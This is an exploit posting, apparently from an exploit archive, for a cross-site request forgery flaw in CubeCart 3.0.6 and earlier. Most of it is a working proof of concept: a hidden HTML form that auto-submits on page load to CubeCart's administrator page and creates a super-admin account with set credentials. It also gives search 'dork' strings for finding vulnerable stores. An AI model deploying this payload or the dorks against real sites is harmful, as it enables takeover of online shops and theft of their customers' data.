CubeCart 3.0.6 Cross Site Request Forgery
Posted on 25 December 2010
#Title : CubeCart <= 3.0.6 CSRF Add Admin #Script : CubeCart <= 3.0.6 #Language : Php #Download : http://www.cubecart.com/ #Date : 2010/12/24 #Version : 3.0.6 #Dork : "Powered by CubeCart 3.0.4" #Dork : "Powered by CubeCart 3.0.5" #Dork : "Powered by CubeCart 3.0.6" #Found : by P0C T34M >> tnt-r00t #Homepage : www.p0c.cc <form name="p0c" action="http://127.0.0.1/cc/admin/adminusers/administrators.php?mode=new" method="post"> <input name="name" type="hidden" value="myname"/ > <input name="adminUsername" type="hidden" value="r00t" /> <input name="email" type="hidden" value="myemail@hotmail.com"> <input name="adminPassword" type="hidden" value="t00r" /> <input name="isSuper" type="hidden" value="1" checked="checked" type="radio"/> <input name="adminId" value="" type="hidden"/> <input name="Submit" type="hidden" class="submit" value="Add User" type="submit"/> </form> <script>document.p0c.submit();</script> NICKNAME: P0C T34M
